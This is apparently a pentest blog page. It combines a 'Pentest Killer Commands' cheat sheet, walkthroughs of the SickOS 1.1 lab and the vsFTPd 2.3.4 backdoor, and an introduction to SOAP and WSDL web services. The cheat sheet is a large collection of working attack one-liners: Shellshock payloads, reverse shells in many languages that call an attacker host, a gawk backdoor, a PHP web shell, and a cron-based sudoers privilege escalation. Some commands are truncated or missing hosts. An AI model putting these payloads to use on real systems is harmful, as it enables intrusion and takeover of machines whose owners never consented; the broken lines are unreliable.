Pentest Killer Commands

Cheat Sheets

Vulnerability assesment

Scanning a webapplication with nikto with proxy configuration.

nikto -host 192.168.xx.xx -userproxy http://192.168.xx.xx:3129


Directory Buster with Proxy

Dirb http://192.168.XX.XX -p 192.168.XX.XX:3129

WPScan With Proxy

wpscan --url 192.168.XX.XX/dir -proxy 192.168.XX.XX:3128

Curl Commands

Browsing the web page with proxy:

  1. curl 192.168.XX.XX/robots.txt -x 192.168.XX.XX:3128
  2. curl --proxy


Browse with verbose move:

 curl -v --proxy


Shell shock exploitation with curl:

curl -H "User-Agent: () { :; }; echo; $CMD" --proxy



curl -H "User-Agent: () { :; }; echo; /bin/uname -a" --proxy
curl -x -A "() { :; };/bin/sh -i >& /dev/tcp/ 0>&1"


Reverse Shell with Curl

curl 'http://192.168.XX.XX/cgi-bin/index.cgi' --user-agent ';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc XXX.XXX.XXX.XXX 80 >/tmp/f;exit' --data 'dest=%0ash</proc/self/environ'

Shellshock exploitation with wget

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=on -e http_proxy= ""
wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/bash -i > /dev/tcp/ 0<&1" -e use_proxy=on -e http_proxy= ""

Spawn Shell

Spawn Python TTY Shell :

python -c 'import pty; pty.spawn("/bin/bash")'


Spawn Interactive sh shell :

/bin/sh -i


Spawn Perl TTY Shell :

exec "/bin/sh"; 

perl e 'exec "/bin/sh";'


Spawn Ruby TTY Shell :

exec "/bin/sh"


Spawn Shell with vi editor :



Spawn TTY shell Nmap



Reverse Shells

Kali Webshell directory:

root@kali:/usr/share/webshells# ls -ltr
total 0
drwxr-xr-x 2 root root 183 Jan 20 2016 php
drwxr-xr-x 2 root root 63 Jan 20 2016 perl
drwxr-xr-x 2 root root 33 Jan 20 2016 cfm
drwxr-xr-x 2 root root 34 Jan 20 2016 aspx
drwxr-xr-x 2 root root 56 Jan 20 2016 asp
drwxr-xr-x 1 root root 40 Feb 8 09:44 jsp



  1. bash -i > /dev/tcp/ATTSCKERS_IP/port 0>&1
  2. exec /bin/bash 0&0 2>&0
  3. 0<&196;exec 196<>/dev/tcp/ATTACKERS_IP/80; sh <&196 >&196 2>&196
  4. exec 5<>/dev/tcp/ATTACKERS_IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
  5. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 445 >/tmp/f



bash -c "bash -i >& /dev/tcp/ 0>&1"
http://192.168.XX.XX:8080/?page=1&rcmd=bash -c "bash -i >& /dev/tcp/ATTACKERS_IP/31337 0>&1"



php -r '$sock=fsockopen("ATTACKERS_IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
Note: TCP uses file descriptor 3. Replace 3 with 4, 5, or 6 if it doesn’t work



  1. nc -e /bin/sh ATTACKERS_IP Port
  2. /bin/sh | nc ATTACKERS_IP Port
  3. rm -f /tmp/p; mknod /tmp/p p && nc ATTACKERS_IP 4444 0/tmp/p



nc -e /bin/sh 4444



  1. rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
  2. telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443



telnet 80 | /bin/bash | telnet 443



perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'



perl -e 'use Socket;$i="192.168.1.XX";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


Perl Windows:

  1. perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
  2. perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'



ruby -rsocket -e'"ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'



r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])


python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);



python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'


Python Reverse Shell URL encode format:




http://192.168.XX.XX:port/?page=mailer&mail=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'



#!/usr/bin/gawk -f BEGIN { Port = 8080 Prompt = "bkd> " Service = "/inet/tcp/" Port "/0/0" while (1) { do { printf Prompt |& Service Service |& getline cmd if (cmd) { while ((cmd |& getline) > 0) print $0 |& Service close(cmd) } } while (cmd != "exit") close(Service) } }


Reverse Shell with Curl

curl 'http://192.168.XX.XX/cgi-bin/index.cgi' --user-agent ';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc XXX.XXX.XXX.XXX 80 >/tmp/f;exit' --data 'dest=%0ash</proc/self/environ'


Building a exploit

Cross compile 32 bit binary on 64 bit Linux:

gcc -m32 exploit.c -o exploit


Cross compile 32 windows .exe on Linux:

i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe


Shell Shock

() { ignored;};/bin/bash -i >& /dev/tcp/ 0>&1




<?php system($_REQUEST[cmd]); ?>






b374k shell 3.2


Privilege escalation 

Cron job update

echo 'chmod 777 /etc/sudoers && echo "<user name (LOW priv)> ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /dir/<cronfile to run>


Reference Sites for enumeration


Reference Links for LFI:


IP Tables Rules:



Reference Links:



SickOS 1.1 Walkthrough

SickOS 1.1 Walkthrough

Attacking Machine : Linux kali 4.3.0-kali1-amd64

Vulnerabile Mahine: SickOS1.1



Started scan with netdiscover command for live host in my network.

We could see three IPs are detected by netdiscover including gateway and default address.

So our target would be


Run the nmap to detect what are the services running on the machine.

nmap -sS -sV -T4 -A

Nmap scan returns ssh and proxy port information.

 By looking into port 3128 we know that a webserver is running and it can be accessible with port proxy.

Configure the local browser proxy to access the web page.

We are all set to access the webapplication. Now run the nikto to detect whether any vulnerabilities present on this application or not.

nikto -h -o out -F html

We found that rebotx.txt is present and found Wolfcms directory is present.

Navigate to wolfcms directory, it landed to Wolf cms application.

By doing some research on the web I found the admin page location for cms application and default user name and password.

With default user name and password I could able to login to administrator account for Wolf application. By visiting the files tab in the application “Upload file” function is available in public directory to upload any file.

I have created c99 shell in attacking machine and uploaded with “Upload file” option.

To launch the shell, navigate to public directory and launch the shell.php which returns web shell.

Using web shell we can list the directories and navigate the directories. When I navigate one directory up I found config file.

Config file disclose the root password for mysql. I have navigated to etc directory and found passwd text in read permissions. This file can be downloaded with web shell.

By analyzing the password we know that “sickos” is one of valid use with bash shell.

I tried to login sickos user with password found in the config file and succeeded.

Pivilage excalation:

Having a limited user access I have ran the sudo -l command to know what are the other commands sickos user can run.

Interestingly sickos user can run all commands 🙂

Connect the root user with sudo -s and I have loged to root user account without a password.

vsFTPd Vulnerability Exploitation

vsftpd, (or very secure FTP daemon)  is an FTP server for Unix-like systems, including Linux, vsftpd is the default FTP server in the Ubuntu, CentOS, Fedora, NimbleX, Slackware and RHEL Linux distributions.

 Identify the vulnerrable host and perform scanning on the vulnerable machine using nmap or any other faviourate scanning tool

nmap -p0-65535

Featured image

Here the interesting part in this machine is port 21, if we enumerate ftp service using telnet port on 21 we might some information.

root@kali:~# telnet 21
Connected to
Escape character is '^]'.
220 (vsFTPd 2.3.4)

This machine has vsFTPD installed on it and vsftpd 2.3.4 version is vulnerable and allows to execute the command at backdoor.

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

 Name Current Setting Required Description
 RHOST                     yes                 The target address
 RPORT      21           yes                  The target port

Exploit target:

 Id Name
 --   ----
 0 Automatic

set the RHOT and RPORT to exploit 

Featured image

Got the shell 🙂

Getting start with Web Penetration testing

Featured image

Why web applications are major targets for attackers.

  • Web services are easy to penetrate as per the attacker’s point of view.
  • Web services are sensitive, attacker can get sensitive information.
  • Increasing of mobile application is attracts the attackers towards the web services.
  • Due to the lack of security implementations and resources available, web services play a vital role making it a possible attacking vector.

SOA Service Oriented Architecture

     Service oriented Architecture is a software design and software architecture design pattern based on discrete pieces of software that provide application functionality as services known as software oriented. A service is a self-contained logical representation of a repeatable function or activity. Services can be combined by other software applications that together provide the complete functionality of a large software application.

Service is well defined activity that does not depend on the state of other services.

Web service

A web service is a standardized way of establishing communication between two web-based application by using open standards over an internet protocol HTTP or HTTPS.

  • Web services are application components
  • Web services communicate using open protocols
  • Web services are self-contained and self-describing
  • Web services can be discovered using UDDI
  • Web services can be used by other applications
  • HTTP and XML is the basis for Web services


  • Language Interoperability (Programming language independent)
  • Platform Independent (Hardware and OS independent)
  • Function Re usability
  • Firewall Friendly
  • Use of Standardized Protocols
  • Stateless Communication
  • Economic

Component of web services

  • Service Consumer
  • Service Provider
  • XML (Extensible Markup Language)
  • SOAP (Simple Object Access Protocol)
  • WSDL (Web Services Description Language)
  • UDDI (Universal Description, Discovery and Integration)

Simple Object Access Protocol (SOAP)

SOAP is a XML-based protocol that lets applications exchange information over HTTP, web serviced use SOAP format to send XML requests.

The actual data flows in the body block and the meta data is usually carried by the header block.

Web Services Description Language (WSDL)

Web Services Description Language is an XML-based language for describing Web services and how to access them”.

As per pen testing web services are concerned, understanding of WSDL file helps a lot in manual pen testing. We can divide WSDL file structure in to two parts according to our definition. 1st part describes what the web service and the 2ndparts tells how to access them


What it contains


All the XML elements are packed under definition element. It is also called as root or parent element of the WSDL file.


All the schema types or data types defined here.


This is a dependent element. Message is specified according to the data types defined in types element. And used in sideoperation element later.


Element collects all the operations within a web service.


Collection of input, output, fault and other message as specified in message element.

input message

It’s nothing but the parameters of the method used in SOAP request.

output message

It’s nothing but the parameters of the method used in SOAP response.


This element connects part 2 of WSDL file with part1 associating itself to the portType element and allows to define the protocol you want to use.


It formulates the SOAP message at runtime.


Contains name of all the services provided by the service provider.


It provides the physical path or location of web server so that service consumer can connect with service provider.

Example WSDL file
<?xml version="1.0" encoding="UTF-8" ?> 
 <definitions xmlns="" xmlns:tns="" xmlns:mime="" xmlns:http="" xmlns:soapenc="" xmlns:itrcmns="" xmlns:xs="" xmlns:soap="" targetNamespace="">
 <xs:schema xmlns:itrException="" xmlns:authInfo="" targetNamespace="" elementFormDefault="qualified" attributeFormDefault="unqualified">
 <xs:import namespace="" schemaLocation="" /> 
 <xs:import namespace="" schemaLocation="" /> 
 <xs:element name="ITRInvalidDocFaultException" type="itrException:ITRInvalidDocFaultException" /> 
 <xs:element name="ITRCredentialFaultException" type="itrException:ITRCredentialFaultException" /> 
 <xs:element name="ITRInvalidCertificateFaultException" type="itrException:ITRInvalidCertificateFaultException" /> 
 <xs:element name="ITRServiceFaultException" type="itrException:ITRServiceFaultException" /> 
 <xs:element name="ITRBusinessServiceFaultException" type="itrException:ITRBusinessServiceFaultException" /> 
 <xs:element name="ITRFaultException" type="itrException:ITRFaultException" /> 


  • WSDL stands for Web Services Description Language
  • WSDL is an XML-based language for describing Web services.
  • WSDL is a W3C recommendation


  • SOAP stands for Simple Object Access Protocol
  • SOAP is an XML based protocol for accessing Web Services.
  • SOAP is based on XML
  • SOAP is a W3C recommendation